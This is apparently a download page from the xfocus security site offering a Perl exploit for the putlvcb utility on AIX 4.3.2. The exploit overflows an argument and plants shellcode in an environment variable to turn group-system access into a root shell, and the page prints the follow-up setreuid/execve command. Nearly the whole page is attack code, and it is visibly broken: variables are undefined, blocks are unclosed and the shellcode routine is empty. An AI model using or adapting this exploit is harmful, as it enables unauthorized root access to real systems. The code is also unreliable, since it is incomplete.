xfocus logo xfocus title
welcome documents programs exploits advisories forums
Chinese Version


Create: 2004-03-24
Platform: Unix
Size: 1591 Bytes
MD5: 4b1323505d960e4089f1c8fed8ad44ee

# FileName: x_putlvcb_aix432_limited.pl
# Exploit putlvcb of Aix4.3.2 to get a uid=0 shell from gid=system.
# Tested  : on Aix4.3.2.
# Author  : watercloud@xfocus.org
# Site    : www.xfocus.org   www.xfocus.net
# Date    : 2003-5-30
# Announce: use as your owner risk!
# Thanks Anthony Roe point out the bug not affect Aix4.3.3.


print "\n\nExploit $CMD for Aix 4.3.2 to get uid=0 shell.\n";
print "From: [ www.xfocus.org 2003-5-30 ].\n\n";
print "Note :\n";
print "You must get gid=0 befor use this exploit.";
print "If you get a shell euid=0 then run this command: ";
print "/usr/bin/syscall setreuid 0 0 \\; execve '/bin/sh'\n";


$ret=system $CMD ,"AAA"."\x2f\xf2\x2b\x40"x300;

for($i=0;$i<4 && $ret;$i++){
  for($j=0;$j<4 && $ret;$j++) {
    $ENV{CCC}="A"x $i .$NOP.&getshell($XID,$UID);
    $ret = system $CMD ,"A"x $j ."\x2f\xf2\x2b\x40"x300;

sub getshell($XID,$GID) {
  my $SHELL,($XID,$GID)=@_;
  return $SHELL;

>> download <<